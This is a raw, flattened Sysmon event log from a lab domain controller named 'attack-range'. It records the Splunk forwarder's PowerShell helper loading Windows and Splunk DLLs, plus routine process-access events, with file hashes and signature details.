Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 23542300x800000000000000099404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3D30780205CA56DD4318DE60071019,SHA256=0676A2BFFCEDE24CF0E0594262879CB2CF7012E2A826F65511557BA7B1E99DEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000099398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.538{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x800000000000000099391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.287{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000099390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.287{326FD73D-C0F1-6294-3B0B-000000005502}48966252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.287{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.287{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.068{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.068{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.068{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.068{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 